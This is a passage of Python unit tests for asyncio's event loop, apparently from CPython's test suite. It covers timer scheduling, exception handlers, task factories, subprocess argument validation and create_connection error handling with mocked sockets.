    executor.submit.return_value = f
    # Default executor path.
    self.loop.set_default_executor(executor)
    res = self.loop.run_in_executor(None, cb)
    self.assertIs(f, res)
    # Explicit executor path.
    executor = mock.Mock()
    executor.submit.return_value = f
    res = self.loop.run_in_executor(executor, cb)
    self.assertIs(f, res)
    self.assertTrue(executor.submit.called)
    f.cancel()  # Don't complain about abandoned Future.
def test__run_once(self):
    """_run_once() drops cancelled head timers and selects on the next deadline."""
    h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
                             self.loop)
    h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
                             self.loop)
    h1.cancel()
    self.loop._process_events = mock.Mock()
    self.loop._scheduled.append(h1)
    self.loop._scheduled.append(h2)
    self.loop._run_once()
    # The select timeout must track h2's deadline (~10s), not cancelled h1.
    t = self.loop._selector.select.call_args[0][0]
    self.assertTrue(9.5 < t < 10.5, t)
    self.assertEqual([h2], self.loop._scheduled)
    self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
    """get_debug() reflects every value passed to set_debug()."""
    for flag in (True, False):
        self.loop.set_debug(flag)
        self.assertEqual(self.loop.get_debug(), flag)
@mock.patch('asyncio.base_events.logger')
def test__run_once_logging(self, m_logger):
    """In debug mode, slow iterations (>1s) log at INFO, fast ones at DEBUG."""
    def slow_select(timeout):
        # Sleep a bit longer than a second to avoid timer resolution
        # issues.
        time.sleep(1.1)
        return []
    # logging needs debug flag
    self.loop.set_debug(True)
    # Log to INFO level if timeout > 1.0 sec.
    self.loop._selector.select = slow_select
    self.loop._process_events = mock.Mock()
    self.loop._run_once()
    self.assertEqual(logging.INFO, m_logger.log.call_args[0][0])
    def fast_select(timeout):
        time.sleep(0.001)
        return []
    self.loop._selector.select = fast_select
    self.loop._run_once()
    self.assertEqual(logging.DEBUG, m_logger.log.call_args[0][0])
def test__run_once_schedule_handle(self):
    """A timer callback may schedule a new ready handle during _run_once()."""
    handle = None
    processed = False
    def cb(loop):
        nonlocal processed, handle
        processed = True
        handle = loop.call_soon(lambda: True)
    # Deadline already in the past, so cb runs on the next iteration.
    h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
                            self.loop)
    self.loop._process_events = mock.Mock()
    self.loop._scheduled.append(h)
    self.loop._run_once()
    self.assertTrue(processed)
    self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
    """Cancelled timers are only purged once their fraction passes the threshold."""
    self.loop._process_events = mock.Mock()
    self.assertTrue(
        0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
    def cb():
        pass
    # Set up one "blocking" event that will not be cancelled to
    # ensure later cancelled events do not make it to the head
    # of the queue and get cleaned.
    not_cancelled_count = 1
    self.loop.call_later(3000, cb)
    # Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
    # cancelled handles, ensure they aren't removed
    cancelled_count = 2
    for x in range(2):
        h = self.loop.call_later(3600, cb)
        h.cancel()
    # Add some cancelled events that will be at head and removed
    cancelled_count += 2
    for x in range(2):
        h = self.loop.call_later(100, cb)
        h.cancel()
    # This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
    self.assertLessEqual(cancelled_count + not_cancelled_count,
                         base_events._MIN_SCHEDULED_TIMER_HANDLES)
    self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
    self.loop._run_once()
    cancelled_count -= 2
    self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
    self.assertEqual(len(self.loop._scheduled),
                     cancelled_count + not_cancelled_count)
    # Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
    # so that deletion of cancelled events will occur on next _run_once
    add_cancel_count = int(math.ceil(
        base_events._MIN_SCHEDULED_TIMER_HANDLES *
        base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
    add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
                               add_cancel_count, 0)
    # Add some events that will not be cancelled
    not_cancelled_count += add_not_cancel_count
    for x in range(add_not_cancel_count):
        self.loop.call_later(3600, cb)
    # Add enough cancelled events
    cancelled_count += add_cancel_count
    for x in range(add_cancel_count):
        h = self.loop.call_later(3600, cb)
        h.cancel()
    # Ensure all handles are still scheduled
    self.assertEqual(len(self.loop._scheduled),
                     cancelled_count + not_cancelled_count)
    self.loop._run_once()
    # Ensure cancelled events were removed
    self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
    # Ensure only uncancelled events remain scheduled
    self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
    """A non-awaitable argument must be rejected with TypeError."""
    with self.assertRaises(TypeError):
        self.loop.run_until_complete('blah')
def test_run_until_complete_loop(self):
    """A future bound to a different loop cannot be run to completion here."""
    task = asyncio.Future(loop=self.loop)
    other_loop = self.new_test_loop()
    self.addCleanup(other_loop.close)
    self.assertRaises(ValueError,
                      other_loop.run_until_complete, task)
def test_subprocess_exec_invalid_args(self):
    """subprocess_exec() rejects bad program arguments and forbidden kwargs."""
    args = [sys.executable, '-c', 'pass']
    # missing program parameter (empty args)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol)
    # expected multiple arguments, not a list
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, args)
    # program arguments must be strings, not int
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, sys.executable, 123)
    # universal_newlines, shell, bufsize must not be set
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, *args, universal_newlines=True)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, *args, shell=True)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
    """subprocess_shell() rejects non-string commands and forbidden kwargs."""
    # expected a string, not an int or a list
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, 123)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
    # universal_newlines, shell, bufsize must not be set
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, 'exit 0', shell=True)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
    """Unhandled callback exceptions are logged by the default handler."""
    self.loop._process_events = mock.Mock()
    def zero_error(fut):
        fut.set_result(True)
        1/0
    # Test call_soon (events.Handle)
    with mock.patch('asyncio.base_events.logger') as log:
        fut = asyncio.Future(loop=self.loop)
        self.loop.call_soon(zero_error, fut)
        fut.add_done_callback(lambda fut: self.loop.stop())
        self.loop.run_forever()
        log.error.assert_called_with(
            test_utils.MockPattern('Exception in callback.*zero'),
            exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
    # Test call_later (events.TimerHandle)
    with mock.patch('asyncio.base_events.logger') as log:
        fut = asyncio.Future(loop=self.loop)
        self.loop.call_later(0.01, zero_error, fut)
        fut.add_done_callback(lambda fut: self.loop.stop())
        self.loop.run_forever()
        log.error.assert_called_with(
            test_utils.MockPattern('Exception in callback.*zero'),
            exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
    """A never-retrieved coroutine exception is logged when the future dies."""
    self.loop._process_events = mock.Mock()
    @asyncio.coroutine
    def zero_error_coro():
        yield from asyncio.sleep(0.01, loop=self.loop)
        1/0
    # Test Future.__del__
    with mock.patch('asyncio.base_events.logger') as log:
        fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
        fut.add_done_callback(lambda *args: self.loop.stop())
        self.loop.run_forever()
        fut = None  # Trigger Future.__del__ or futures._TracebackLogger
        support.gc_collect()
        if PY34:
            # Future.__del__ in Python 3.4 logs error with
            # an actual exception context
            log.error.assert_called_with(
                test_utils.MockPattern('.*exception was never retrieved'),
                exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
        else:
            # futures._TracebackLogger logs only textual traceback
            log.error.assert_called_with(
                test_utils.MockPattern(
                    '.*exception was never retrieved.*ZeroDiv'),
                exc_info=False)
def test_set_exc_handler_invalid(self):
    """set_exception_handler() rejects values that are neither callable nor None."""
    message = 'A callable object or None'
    with self.assertRaisesRegex(TypeError, message):
        self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
    """A custom exception handler gets the context; resetting restores logging."""
    def zero_error():
        1/0
    def run_loop():
        handle = self.loop.call_soon(zero_error)
        self.loop._run_once()
        return handle
    self.loop.set_debug(True)
    self.loop._process_events = mock.Mock()
    self.assertIsNone(self.loop.get_exception_handler())
    mock_handler = mock.Mock()
    self.loop.set_exception_handler(mock_handler)
    self.assertIs(self.loop.get_exception_handler(), mock_handler)
    handle = run_loop()
    mock_handler.assert_called_with(self.loop, {
        'exception': MOCK_ANY,
        'message': test_utils.MockPattern(
            'Exception in callback.*zero_error'),
        'handle': handle,
        'source_traceback': handle._source_traceback,
    })
    mock_handler.reset_mock()
    # After resetting, the default handler logs and the custom one stays idle.
    self.loop.set_exception_handler(None)
    with mock.patch('asyncio.base_events.logger') as log:
        run_loop()
        log.error.assert_called_with(
            test_utils.MockPattern(
                'Exception in callback.*zero'),
            exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
    assert not mock_handler.called
def test_set_exc_handler_broken(self):
    """An exception handler that itself raises is reported via logger.error."""
    def run_loop():
        def zero_error():
            1/0
        self.loop.call_soon(zero_error)
        self.loop._run_once()
    def handler(loop, context):
        raise AttributeError('spam')
    self.loop._process_events = mock.Mock()
    self.loop.set_exception_handler(handler)
    with mock.patch('asyncio.base_events.logger') as log:
        run_loop()
        log.error.assert_called_with(
            test_utils.MockPattern(
                'Unhandled error in exception handler'),
            exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
    """A raising default_exception_handler is caught and logged, with context."""
    _context = None
    class Loop(base_events.BaseEventLoop):
        _selector = mock.Mock()
        _process_events = mock.Mock()
        def default_exception_handler(self, context):
            nonlocal _context
            _context = context
            # Simulates custom buggy "default_exception_handler"
            raise ValueError('spam')
    loop = Loop()
    self.addCleanup(loop.close)
    asyncio.set_event_loop(loop)
    def run_loop():
        def zero_error():
            1/0
        loop.call_soon(zero_error)
        loop._run_once()
    with mock.patch('asyncio.base_events.logger') as log:
        run_loop()
        log.error.assert_called_with(
            'Exception in default exception handler',
            exc_info=True)
    def custom_handler(loop, context):
        raise ValueError('ham')
    _context = None
    loop.set_exception_handler(custom_handler)
    with mock.patch('asyncio.base_events.logger') as log:
        run_loop()
        log.error.assert_called_with(
            test_utils.MockPattern('Exception in default exception.*'
                                   'while handling.*in custom'),
            exc_info=True)
    # Check that original context was passed to default
    # exception handler.
    self.assertIn('context', _context)
    self.assertIs(type(_context['context']['exception']),
                  ZeroDivisionError)
def test_set_task_factory_invalid(self):
    """set_task_factory() rejects a non-callable factory and stays unset."""
    pattern = 'task factory must be a callable or None'
    with self.assertRaisesRegex(TypeError, pattern):
        self.loop.set_task_factory(1)
    self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
    """A custom task factory is used by create_task() until reset to None."""
    self.loop._process_events = mock.Mock()
    class MyTask(asyncio.Task):
        pass
    @asyncio.coroutine
    def coro():
        pass
    factory = lambda loop, coro: MyTask(coro, loop=loop)
    self.assertIsNone(self.loop.get_task_factory())
    self.loop.set_task_factory(factory)
    self.assertIs(self.loop.get_task_factory(), factory)
    task = self.loop.create_task(coro())
    self.assertTrue(isinstance(task, MyTask))
    self.loop.run_until_complete(task)
    # Reset: create_task() falls back to plain asyncio.Task.
    self.loop.set_task_factory(None)
    self.assertIsNone(self.loop.get_task_factory())
    task = self.loop.create_task(coro())
    self.assertTrue(isinstance(task, asyncio.Task))
    self.assertFalse(isinstance(task, MyTask))
    self.loop.run_until_complete(task)
def test_env_var_debug(self):
    """PYTHONASYNCIODEBUG=1 enables debug mode unless -E ignores the env."""
    code = '\n'.join((
        'import asyncio',
        'loop = asyncio.get_event_loop()',
        'print(loop.get_debug())'))
    # Test with -E to not fail if the unit test was run with
    # PYTHONASYNCIODEBUG set to a non-empty string
    sts, stdout, stderr = assert_python_ok('-E', '-c', code)
    self.assertEqual(stdout.rstrip(), b'False')
    sts, stdout, stderr = assert_python_ok('-c', code,
                                           PYTHONASYNCIODEBUG='')
    self.assertEqual(stdout.rstrip(), b'False')
    sts, stdout, stderr = assert_python_ok('-c', code,
                                           PYTHONASYNCIODEBUG='1')
    self.assertEqual(stdout.rstrip(), b'True')
    sts, stdout, stderr = assert_python_ok('-E', '-c', code,
                                           PYTHONASYNCIODEBUG='1')
    self.assertEqual(stdout.rstrip(), b'False')
def test_create_task(self):
    """ensure_future() delegates task creation to the loop's create_task()."""
    class MyTask(asyncio.Task):
        pass
    @asyncio.coroutine
    def test():
        pass
    class EventLoop(base_events.BaseEventLoop):
        def create_task(self, coro):
            return MyTask(coro, loop=loop)
    loop = EventLoop()
    self.set_event_loop(loop)
    coro = test()
    task = asyncio.ensure_future(coro, loop=loop)
    self.assertIsInstance(task, MyTask)
    # make warnings quiet
    task._log_destroy_pending = False
    coro.close()
def test_run_forever_keyboard_interrupt(self):
    """KeyboardInterrupt escaping run_until_complete() must not be re-reported."""
    # Python issue #22601: ensure that the temporary task created by
    # run_forever() consumes the KeyboardInterrupt and so doesn't log
    # a warning
    @asyncio.coroutine
    def raise_keyboard_interrupt():
        raise KeyboardInterrupt
    self.loop._process_events = mock.Mock()
    self.loop.call_exception_handler = mock.Mock()
    try:
        self.loop.run_until_complete(raise_keyboard_interrupt())
    except KeyboardInterrupt:
        pass
    self.loop.close()
    support.gc_collect()
    self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
    """After a BaseException, no stale stop() call may linger in the loop."""
    # Python issue #22429: run_until_complete() must not schedule a pending
    # call to stop() if the future raised a BaseException
    @asyncio.coroutine
    def raise_keyboard_interrupt():
        raise KeyboardInterrupt
    self.loop._process_events = mock.Mock()
    try:
        self.loop.run_until_complete(raise_keyboard_interrupt())
    except KeyboardInterrupt:
        pass
    def func():
        self.loop.stop()
        func.called = True
    func.called = False
    try:
        self.loop.call_soon(func)
        self.loop.run_forever()
    except KeyboardInterrupt:
        pass
    # run_forever() must have reached func; a leftover stop() would skip it.
    self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
    """An event callback scheduled before stop() must run exactly once."""
    # Python issue #25593: A stopped event loop may cause event callbacks
    # to run more than once.
    event_sentinel = object()
    callcount = 0
    doer = None
    def proc_events(event_list):
        nonlocal doer
        if event_sentinel in event_list:
            doer = self.loop.call_soon(do_event)
    def do_event():
        nonlocal callcount
        callcount += 1
        self.loop.call_soon(clear_selector)
    def clear_selector():
        doer.cancel()
        self.loop._selector.select.return_value = ()
    self.loop._process_events = proc_events
    self.loop._selector.select.return_value = (event_sentinel,)
    for i in range(1, 3):
        with self.subTest('Loop %d/2' % i):
            self.loop.call_soon(self.loop.stop)
            self.loop.run_forever()
            self.assertEqual(callcount, 1)
def test_run_once(self):
    """test_utils.run_once() runs exactly one loop iteration."""
    # Simple test for test_utils.run_once(). It may seem strange
    # to have a test for this (the function isn't even used!) but
    # it's a de facto standard API for library tests. This tests
    # the idiom: loop.call_soon(loop.stop); loop.run_forever().
    count = 0
    def callback():
        nonlocal count
        count += 1
    self.loop._process_events = mock.Mock()
    self.loop.call_soon(callback)
    test_utils.run_once(self.loop)
    self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
    """Calling stop() before run_forever() makes it return after one poll."""
    # Test that the old idiom for pre-stopping the loop works.
    self.loop._process_events = mock.Mock()
    self.loop.stop()
    self.loop.run_forever()
    self.loop._selector.select.assert_called_once_with(0)
class MyProto(asyncio.Protocol):
    """Test stream protocol tracking lifecycle state and received byte count.

    State advances INITIAL -> CONNECTED -> (EOF) -> CLOSED; an optional
    future (``done``) is resolved on connection_lost().
    """

    done = None

    def __init__(self, create_future=False):
        self.state = 'INITIAL'
        self.nbytes = 0
        if create_future:
            self.done = asyncio.Future()

    def _expect_state(self, *allowed):
        # Every transition is guarded: the current state must be one of
        # the allowed predecessors (assert message shows the bad state).
        assert self.state in allowed, self.state

    def connection_made(self, transport):
        self.transport = transport
        self._expect_state('INITIAL')
        self.state = 'CONNECTED'
        transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')

    def data_received(self, data):
        self._expect_state('CONNECTED')
        self.nbytes += len(data)

    def eof_received(self):
        self._expect_state('CONNECTED')
        self.state = 'EOF'

    def connection_lost(self, exc):
        self._expect_state('CONNECTED', 'EOF')
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
    """Test datagram protocol tracking lifecycle state and received byte count.

    State advances INITIAL -> INITIALIZED -> CLOSED; an optional future
    (``done``) is resolved on connection_lost().
    """

    done = None

    def __init__(self, create_future=False, loop=None):
        self.state = 'INITIAL'
        self.nbytes = 0
        if create_future:
            self.done = asyncio.Future(loop=loop)

    def _expect_state(self, expected):
        # Guard each transition; the assert message shows the bad state.
        assert self.state == expected, self.state

    def connection_made(self, transport):
        self.transport = transport
        self._expect_state('INITIAL')
        self.state = 'INITIALIZED'

    def datagram_received(self, data, addr):
        self._expect_state('INITIALIZED')
        self.nbytes += len(data)

    def error_received(self, exc):
        self._expect_state('INITIALIZED')

    def connection_lost(self, exc):
        self._expect_state('INITIALIZED')
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
    """Create and install a fresh selector event loop for each test."""
    super().setUp()
    self.loop = asyncio.new_event_loop()
    self.set_event_loop(self.loop)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
    """Per-address connect failures are merged into one 'Multiple exceptions' OSError."""
    class MyProto(asyncio.Protocol):
        pass
    @asyncio.coroutine
    def getaddrinfo(*args, **kw):
        yield from []
        return [(2, 1, 6, '', ('107.6.106.82', 80)),
                (2, 1, 6, '', ('107.6.106.82', 80))]
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    idx = -1
    errors = ['err1', 'err2']
    def _socket(*args, **kw):
        # Each socket() attempt raises the next canned error.
        nonlocal idx, errors
        idx += 1
        raise OSError(errors[idx])
    m_socket.socket = _socket
    self.loop.getaddrinfo = getaddrinfo_task
    coro = self.loop.create_connection(MyProto, 'example.com', 80)
    with self.assertRaises(OSError) as cm:
        self.loop.run_until_complete(coro)
    self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
    """The freshly created socket is closed when sock_connect() times out."""
    # Ensure that the socket is closed on timeout
    sock = mock.Mock()
    m_socket.socket.return_value = sock
    def getaddrinfo(*args, **kw):
        fut = asyncio.Future(loop=self.loop)
        addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
                ('127.0.0.1', 80))
        fut.set_result([addr])
        return fut
    self.loop.getaddrinfo = getaddrinfo
    with mock.patch.object(self.loop, 'sock_connect',
                           side_effect=asyncio.TimeoutError):
        coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
        with self.assertRaises(asyncio.TimeoutError):
            self.loop.run_until_complete(coro)
        self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
    """Passing host/port together with an explicit sock must raise ValueError."""
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, sock=object())
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(coro)
def test_create_connection_wrong_sock(self):
    """create_connection() refuses a datagram socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    with sock:
        coro = self.loop.create_connection(MyProto, sock=sock)
        with self.assertRaisesRegex(ValueError,
                                    'A Stream Socket was expected'):
            self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
    """create_server() refuses a datagram socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    with sock:
        coro = self.loop.create_server(MyProto, sock=sock)
        with self.assertRaisesRegex(ValueError,
                                    'A Stream Socket was expected'):
            self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
                     'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
    """A SOCK_STREAM socket with extra flag bits is still accepted as a stream."""
    sock = socket.socket(
        socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
    with sock:
        coro = self.loop.create_server(lambda: None, sock=sock)
        srv = self.loop.run_until_complete(coro)
        srv.close()
        self.loop.run_until_complete(srv.wait_closed())
def test_create_datagram_endpoint_wrong_sock(self):
    """create_datagram_endpoint() refuses a stream socket."""
    sock = socket.socket(socket.AF_INET)
    with sock:
        coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
        with self.assertRaisesRegex(ValueError,
                                    'A UDP Socket was expected'):
            self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
    """With neither host/port nor sock given, create_connection() must fail."""
    coro = self.loop.create_connection(MyProto)
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(coro)
def test_create_connection_no_getaddrinfo(self):
    """An empty getaddrinfo() result surfaces as OSError."""
    @asyncio.coroutine
    def getaddrinfo(*args, **kw):
        yield from []
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    coro = self.loop.create_connection(MyProto, 'example.com', 80)
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
    """A sock_connect() failure propagates as OSError."""
    @asyncio.coroutine
    def getaddrinfo(*args, **kw):
        yield from []
        return [(2, 1, 6, '', ('107.6.106.82', 80))]
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.side_effect = OSError
    coro = self.loop.create_connection(MyProto, 'example.com', 80)
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
    """Failure on every resolved address raises OSError to the caller."""
    @asyncio.coroutine
    def getaddrinfo(*args, **kw):
        return [(2, 1, 6, '', ('0.0.0.1', 80)),
                (2, 1, 6, '', ('0.0.0.2', 80))]
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.side_effect = OSError
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, family=socket.AF_INET)
    with self.assertRaises(OSError):
        self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
    """bind() and connect() errors are merged; the failed socket is closed."""
    def bind(addr):
        # Only the first address fails to bind.
        if addr[0] == '0.0.0.1':
            err = OSError('Err')
            err.strerror = 'Err'
            raise err
    m_socket.socket.return_value.bind = bind
    @asyncio.coroutine
    def getaddrinfo(*args, **kw):
        return [(2, 1, 6, '', ('0.0.0.1', 80)),
                (2, 1, 6, '', ('0.0.0.2', 80))]
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.side_effect = OSError('Err2')
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, family=socket.AF_INET,
        local_addr=(None, 8080))
    with self.assertRaises(OSError) as cm:
        self.loop.run_until_complete(coro)
    self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
    self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
    """Helper: connect to literal IPv4/IPv6 addresses, with/without inet_pton."""
    # Test the fallback code, even if this system has inet_pton.
    if not allow_inet_pton:
        del m_socket.inet_pton
    m_socket.getaddrinfo = socket.getaddrinfo
    sock = m_socket.socket.return_value
    self.loop._add_reader = mock.Mock()
    self.loop._add_reader._is_coroutine = False
    self.loop._add_writer = mock.Mock()
    self.loop._add_writer._is_coroutine = False
    coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
    t, p = self.loop.run_until_complete(coro)
    try:
        sock.connect.assert_called_with(('1.2.3.4', 80))
        _, kwargs = m_socket.socket.call_args
        self.assertEqual(kwargs['family'], m_socket.AF_INET)
        self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
    finally:
        t.close()
        test_utils.run_briefly(self.loop)  # allow transport to close
    sock.family = socket.AF_INET6
    coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
    t, p = self.loop.run_until_complete(coro)
    try:
        # Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
        # to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
        [address] = sock.connect.call_args[0]
        host, port = address[:2]
        self.assertRegex(host, r'::(0\.)*1')
        self.assertEqual(port, 80)
        _, kwargs = m_socket.socket.call_args
        self.assertEqual(kwargs['family'], m_socket.AF_INET6)
        self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
    finally:
        t.close()
        test_utils.run_briefly(self.loop)  # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
    """Exercise the IP-literal path with inet_pton available."""
    self._test_create_connection_ip_addr(m_socket, allow_inet_pton=True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
    """Exercise the IP-literal fallback path without inet_pton."""
    self._test_create_connection_ip_addr(m_socket, allow_inet_pton=False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
    """Service names ('http') resolve to port numbers; bogus names raise OSError."""
    m_socket.getaddrinfo = socket.getaddrinfo
    sock = m_socket.socket.return_value
    self.loop._add_reader = mock.Mock()
    self.loop._add_reader._is_coroutine = False
    self.loop._add_writer = mock.Mock()
    self.loop._add_writer._is_coroutine = False
    for service, port in ('http', 80), (b'http', 80):
        coro = self.loop.create_connection(asyncio.Protocol,
                                           '127.0.0.1', service)
        t, p = self.loop.run_until_complete(coro)
        try:
            sock.connect.assert_called_with(('127.0.0.1', port))
            _, kwargs = m_socket.socket.call_args
            self.assertEqual(kwargs['family'], m_socket.AF_INET)
            self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
        finally:
            t.close()
            test_utils.run_briefly(self.loop)  # allow transport to close
    for service in 'nonsense', b'nonsense':
        coro = self.loop.create_connection(asyncio.Protocol,
                                           '127.0.0.1', service)
        with self.assertRaises(OSError):
            self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
    """An unresolvable local_addr makes create_connection() raise OSError."""
    @asyncio.coroutine
    def getaddrinfo(host, *args, **kw):
        # Remote host resolves; the local address lookup returns nothing.
        if host == 'example.com':
            return [(2, 1, 6, '', ('107.6.106.82', 80)),
                    (2, 1, 6, '', ('107.6.106.82', 80))]
        else:
            return []
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, family=socket.AF_INET,
        local_addr=(None, 8080))
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
    """Unrecognized address formats fall back to getaddrinfo()."""
    # See http://bugs.python.org/issue27136, fallback to getaddrinfo when
    # we can't recognize an address is resolved, e.g. a Bluetooth address.
    addr = ('00:01:02:03:04:05', 1)
    def getaddrinfo(host, port, *args, **kw):
        assert (host, port) == addr
        return [(999, 1, 999, '', (addr, 1))]
    m_socket.getaddrinfo = getaddrinfo
    sock = m_socket.socket()
    coro = self.loop.sock_connect(sock, addr)
    self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
    """ssl=True defaults server_hostname to the host; explicit values win."""
    self.loop.getaddrinfo = mock.Mock()
    def mock_getaddrinfo(*args, **kwds):
        f = asyncio.Future(loop=self.loop)
        f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
                       socket.SOL_TCP, '', ('1.2.3.4', 80))])
        return f
    self.loop.getaddrinfo.side_effect = mock_getaddrinfo
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.return_value = ()
    self.loop._make_ssl_transport = mock.Mock()
    class _SelectorTransportMock:
        _sock = None
        def get_extra_info(self, key):
            return mock.Mock()
        def close(self):
            self._sock.close()
    def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
                                **kwds):
        waiter.set_result(None)
        transport = _SelectorTransportMock()
        transport._sock = sock
        return transport
    self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
    ANY = mock.ANY
    # First try the default server_hostname.
    self.loop._make_ssl_transport.reset_mock()
    coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True)
    transport, _ = self.loop.run_until_complete(coro)
    transport.close()
    self.loop._make_ssl_transport.assert_called_with(
        ANY, ANY, ANY, ANY,
        server_side=False,
